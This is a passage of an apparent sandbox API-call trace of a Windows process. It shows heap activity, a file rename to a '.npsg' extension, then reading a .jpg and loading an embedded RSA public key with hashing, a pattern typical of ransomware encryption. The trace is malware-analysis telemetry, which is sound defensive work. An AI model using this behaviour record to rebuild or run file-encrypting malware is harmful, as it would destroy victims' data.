lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005a8 [0237.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0237.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005c0 [0237.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400590 [0237.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400620 [0237.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005f0 [0237.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005d8 [0237.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400638 [0237.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005d8 | out: hHeap=0x620000) returned 1 [0237.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005d8 [0237.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005f0 | out: hHeap=0x620000) returned 1 [0237.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005a8 | out: hHeap=0x620000) returned 1 [0237.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005a8 [0237.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400608 | out: hHeap=0x620000) returned 1 [0237.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0237.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400638 | out: hHeap=0x620000) returned 1 [0237.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0237.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0237.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005a8 | out: hHeap=0x620000) returned 1 [0237.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0237.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005d8 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400620 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005c0 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400590 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0237.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400578 | out: hHeap=0x620000) returned 1 [0237.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409050 | out: hHeap=0x620000) returned 1 [0237.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0237.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0237.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0237.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0237.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.352] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x73a4, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb14*=0x73a4, lpOverlapped=0x0) returned 1 [0237.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.352] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x73a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.352] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0237.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0237.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.353] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.353] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.353] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.353] CloseHandle (hObject=0x644) returned 1 [0237.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e728 [0237.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b83cd0 [0237.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e728 | out: hHeap=0x620000) returned 1 [0237.355] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\3cSlbbowxq5ttWRL0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukh5\\3cslbbowxq5ttwrl0.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\3cSlbbowxq5ttWRL0.mp3.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukh5\\3cslbbowxq5ttwrl0.mp3.npsg")) returned 1 [0237.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.356] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.357] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8cacd30, ftCreationTime.dwHighDateTime=0x1d5c21e, ftLastAccessTime.dwLowDateTime=0x835bc2b0, ftLastAccessTime.dwHighDateTime=0x1d5c395, ftLastWriteTime.dwLowDateTime=0x835bc2b0, ftLastWriteTime.dwHighDateTime=0x1d5c395, nFileSizeHigh=0x0, nFileSizeLow=0xe1f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4 FWN8QfMEos_mmG9-wb.jpg", cAlternateFileName="4FWN8Q~1.JPG")) returned 1 [0237.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.358] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\4 FWN8QfMEos_mmG9-wb.jpg") returned=".jpg" [0237.358] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UKh5\\4 FWN8QfMEos_mmG9-wb.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ukh5\\4 fwn8qfmeos_mmg9-wb.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.358] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=57844) returned 1 [0237.358] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.361] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xe1ce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.361] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.363] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.363] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.363] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xe1f4, lpOverlapped=0x0) returned 1 [0237.364] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.364] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.364] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.364] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.365] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.365] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.366] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.366] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.366] GetLastError () returned 0x0 [0237.366] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.366] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.366] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.366] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.366] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe1f0) returned 0x3b95d50 [0237.366] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0237.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409050 [0237.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400578 [0237.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409098 [0237.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400590 [0237.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005c0 [0237.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400620 [0237.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005d8 [0237.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.367] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005c0 | out: hHeap=0x620000) returned 1 [0237.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005d8 | out: hHeap=0x620000) returned 1 [0237.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400620 | out: hHeap=0x620000) returned 1 [0237.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400620 [0237.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34005d8 [0237.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34005c0 [0237.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0237.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0237.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0237.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005d8 | out: hHeap=0x620000) returned 1 [0237.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005c0 | out: hHeap=0x620000) returned 1 [0237.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400620 | out: hHeap=0x620000) returned 1 [0237.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0237.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.368] GetCurrentThreadId () returned 0x5b4 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b820d8 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.369] GetCurrentThreadId () returned 0x5b4 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.369] RtlAllocateHeap 